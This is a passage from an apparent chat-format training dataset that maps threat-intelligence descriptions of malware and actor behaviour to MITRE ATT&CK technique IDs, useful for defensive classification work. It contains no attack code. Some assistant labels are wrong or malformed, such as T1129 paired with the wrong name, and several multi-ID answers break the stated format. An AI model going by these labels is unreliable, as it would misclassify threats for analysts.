drives and mapped network drives." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Embedded Trojan This Trojan loaded by the first payload contains several embedded executables that it uses to ultimately download and execute a secondary payload, as well as downloading and opening a decoy document. Upon execution, this Trojan checks to see if it was configured with \"BINDERON\" to determine if it should extract an embedded payload from a resource named \"B\", save it to %TEMP%\\%BIND1%, and create a new process with the embedded payload. While the Trojan was configured to carry out this activity, the actor did not embed a payload within the \"B\" resource, so this functionality does not carry out any activities, rather it just causes an exception and continues running. Another configuration option encountered by this Trojan is a check for '%STARTUPON%'. This sample was not configured to execute with this option enabled, however, should this option be enabled, the Trojan would attempt to install itself to the system at a specific location by writing its contents in base64-encoded format to the following file" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors encrypted IP addresses used for \"Agent\" proxy hops with RC4." }, { "role": "assistant", "content": "T1001 - Data Obfuscation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bumblebee can use PowerShell for execution." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacMa can dump credentials from the macOS keychain." }, { "role": "assistant", "content": "T1555.001 - Credentials from Password Stores: Keychain" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Micropsia collects the username from the victim’s machine." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses the command prompt to execute commands on the victim's machine." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Saint Bot has used `.vbs` scripts for execution." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StrongPity can use PowerShell to add files to the Windows Defender exclusions list." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Static Kitten is distributing at least two URLs that deliver two different ZIP files that are themed to be relevant to government agency employees. The URLs are distributed through phishing emails with lure and decoy documents. An example lure is shown in Figure 2 below" }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When users run the malicious CHM file, the HTM file’s code is executed. The script decompiles the CHM file through hh.exe and runs LBTWiz32.exe. It then creates a normal image file (KBSI_SNS_003.jpg) on the PC screen, making it difficult for users to recognize malicious behaviors." }, { "role": "assistant", "content": "T1218 - Signed Binary Proxy Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CosmicDuke copies and exfiltrates the clipboard contents every 30 seconds." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike. Use scheduled tasks and batch files for automation. The use of LOLBins. Erasing Windows Event Logs, files and tasks" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dtrack contains a function that calls \"LoadLibrary\" and \"GetProcAddress\"." }, { "role": "assistant", "content": "T1129 - Server Software Component" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The cab file was encrypted and decrypted using a simple xor cipher with a rotating 16 byte key: \\x36\\x11\\xdd\\x08\\xac\\x4b\\x72\\xf8\\x51\\x04\\x68\\x2e\\x3e\\x38\\x64\\x32" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lizar has used PowerShell scripts." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETWIRE has the ability to write collected data to a file created in the \"./LOGS\" directory." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Even though Delphi Cannon uses POP3S and SMTPS for its C2 communications like Cannon, it is arguably easier to defend against as it uses an actor owned domain that defenders can easily block and not a legitimate email provider such as Seznam" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team checks for connectivity to other resources in the network." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "side loads a malicious file, sspisrv.dll, in part of a spoofed lssas.exe service." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Although, the use of target names with actuating themes is not new to this group, there has been a significant uptick in the number of emails received and this campaign has been persistently active for the past few weeks" }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "njRAT gathers information about opened windows during the initial infection." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 15: Structure used to send data to server Figure 16: Structure used to send data to C2 server The structure is converted to Base64 using the CryptBinaryToStringA function" }, { "role": "assistant", "content": "T1048 - Exfiltration Over Alternative Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Get2 has the ability to use HTTP to send information collected from an infected host to C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The CoinTicker app also creates a user launch agent, named .espl.plist, that runs the same command periodically" }, { "role": "assistant", "content": "T1543.001 - Create or Modify System Process: Launch Agent" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Traffic traversing the Tor network will be forwarded to multiple nodes before exiting the Tor network and continuing on to its intended destination." }, { "role": "assistant", "content": "T1090.003 - Proxy: Multi-hop Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SombRAT has the ability to modify its process memory to hide process command-line arguments." }, { "role": "assistant", "content": "T1564.010 - Process Argument Spoofing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has distributed targeted emails containing links to malicious documents with embedded macros." }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly 2.0 created accounts disguised as legitimate backup and service accounts as well as an email administration account." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 has installed a new Windows service to establish persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "menuPass has used Putty Secure Copy Client (PSCP) to transfer data." }, { "role": "assistant", "content": "T1021.004 - Remote Services: SSH" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ran a command to compile an archive of file types of interest from the victim user's directories." }, { "role": "assistant", "content": "T1005 - Data from Local System', 'T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remexi includes different modules that it deploys in its working directory, including configuration decryption and parsing, launching victim activity logging in a separate module, and seven threads for various espionage and auxiliary functions" }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools', 'T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WannaCry contains a thread that will attempt to scan for new attached drives every few seconds. If one is identified, it will encrypt the files on the attached device." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Indrik Spider has collected credentials from infected systems, including domain accounts." }, { "role": "assistant", "content": "T1078.002 - Domain Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AdFind can enumerate domain users." }, { "role": "assistant", "content": "T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "network traffic can communicate over a raw socket." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "More_eggs can obtain information on installed anti-malware programs." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "netstat can be used to enumerate local network connections, including active TCP connections and other network statistics." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DownPaper collects the victim username and sends it to the C2 server." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Filename SHA256 Description 7za.exe dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 7-Zip 17.01 beta hb.exe 3ca3a957c526eaeabcf17b0b2cd345c0fffab549adfdf04470b6983b87f7ec62 Hobocopy nbt.exe c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e nbtscan 1.0.35 rx.exe a6a0fbfee08367046d3d26fb4b4cf7779f7fb6eaf7e60e1d9b6bf31c5be5b63e IntelliAdmin Remote Execute v1.0 tardigrade.exe fe1b011fe089969d960d2dce2a61020725a02e15dbc812ee6b6ecc6a98875392 Tardigrade application" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has detached network shares after exfiltrating files, likely to evade detection." }, { "role": "assistant", "content": "T1070.005 - Indicator Removal on Host: Network Share Connection Removal" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cyclops Blink can use DNS over HTTPS (DoH) to resolve C2 nodes." }, { "role": "assistant", "content": "T1572 - Protocol Tunneling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BitPaymer has set the run key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" for persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackMatter leverages LDAP and SMB protocol to discover all hosts in the AD." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Epic collects the user name from the victim’s machine." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "first stage shellcode contains a NOP sled with alternative instructions that was likely designed to bypass antivirus tools." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use HTTP or DNS for C2." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WastedLocker checked if UCOMIEnumConnections and IActiveScriptParseProcedure32 Registry keys were detected as part of its anti-analysis technique." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoetRAT has used a .NET tool named dog.exe to exiltrate information over an e-mail account." }, { "role": "assistant", "content": "T1048 - Exfiltration Over Alternative Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Cannon Trojan is written in C# and functions primarily as a downloader that relies on emails to communicate between the Trojan and the C2 server. To communicate with the C2 server, the Trojan will send emails to specific email addresses via SMTPS over TCP port 587" }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Trojan.Karagany samples sometimes use common binary packers such as UPX and Aspack on top of a custom Delphi binary packer." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mivast creates the following Registry entry: \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Micromedia\"." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Code is included to copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and much more" }, { "role": "assistant", "content": "T1115 - Clipboard Data', 'T1070.004 - Indicator Removal on Host: File Deletion', 'T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kessel can download additional modules from the C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chaes has decrypted an AES encrypted binary file to trigger the download of other files." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleSeed has the ability to use JavaScript to execute PowerShell." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has collected e-mail addresses for activists and bloggers in order to target them with spyware." }, { "role": "assistant", "content": "T1589.002 - Email Addresses" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has used the icacls command to modify access control to backup servers, providing them with full control of all the system folders." }, { "role": "assistant", "content": "T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used a tool called MailSniper to search for files on the desktop and another utility called Sobolsoft to extract attachments from EML files." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has lured targets to download a Cobalt Strike beacon by including a malicious link within spearphishing emails." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoetRAT has the ability to compress files with zip." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pupy can compress data with Zip before sending it over C2." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IndigoZebra sent spearphishing emails containing malicious password-protected RAR attachments." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Frankenstein has enumerated hosts via Empire, gathering various local system information." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "attempts to detect several anti-virus products." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RainyDay has the ability to uninstall itself by deleting its service and files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rifdoor has encrypted command and control (C2) communications with a stream cipher." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Backdoor.Oldrea can use a network scanning module to identify ICS-related ports." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The dropper extracts modules from these resources by seeking a specific offset and reading a specific number of bytes as the length of the ciphertext. The dropper then decrypts the ciphertext by using an XOR cipher and a specific base64 encode string that is decoded and used as the key. Before accessing the ciphertext, the dropper subtracts 14 from the specified offset, which is the same as previous Disttrack samples delivered in Shamoon 2 attacks. Tables 1, 2, and 3 include the resources, the information used to extract them, and the resulting module" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium has used unverified signatures on malicious DLLs." }, { "role": "assistant", "content": "T1036.001 - Invalid Code Signature" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Windshift has used links embedded in e-mails to lure victims into executing malicious code." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Table 2 Sandbox evasion checks in the C# variant of RogueRobin Like the original version, the C# variant of RogueRobin uses DNS tunneling to communicate with its C2 server using a variety of different DNS query types" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The implant either fetches the user agent from Internet Explorer (using ObtainUserAgentAsString()) or uses a default user agent specified in the malware binary: Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95 Safari/537.36 Control Server Communications. The malware initiates communication with the control server by sending it an HTTP POST request with additional optional HTTP data." }, { "role": "assistant", "content": "T1036 - Masquerading', 'T1048 - Exfiltration Over Alternative Protocol', 'T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has used various strains of malware to query the Registry." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has edited the `Microsoft.IdentityServer.Servicehost.exe.config` file to load a malicious DLL into the AD FS process, thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name." }, { "role": "assistant", "content": "T1556.007 - Hybrid Identity" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN8's malicious spearphishing payloads are executed as PowerShell. FIN8 has also used PowerShell for lateral movement and credential access." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is digitally signed by Microsoft." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SharpStage can execute arbitrary commands with the command line." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Axiom has used VPS hosting providers in targeting of intended victims." }, { "role": "assistant", "content": "T1583.003 - Virtual Private Server" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Higaisa used an XSL file to run VBScript code." }, { "role": "assistant", "content": "T1220 - XSL Script Processing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of deleting files. It has been observed loading a Linux Kernel Module (LKM) and then deleting it from the hard disk as well as overwriting the data with null bytes." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla surveys a system upon check-in to discover remote systems on a local network using the \"net view\" and \"net view /DOMAIN\" commands. Turla has also used \"net group \"Domain Computers\" /domain\", \"net group \"Domain Controllers\" /domain\", and \"net group \"Exchange Servers\" /domain\" to enumerate domain computers, including the organization's DC and Exchange Server." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The config file is encrypted with RC4." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 has locally staged encrypted archives for later exfiltration efforts." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Each Casbaneiro sample using this method has the buyer’s ID hardcoded in its data. When it downloads such configuration file, it parses it and finds the line that is intended for the specific buyer’s ID and downloads and executes the payload" }, { "role": 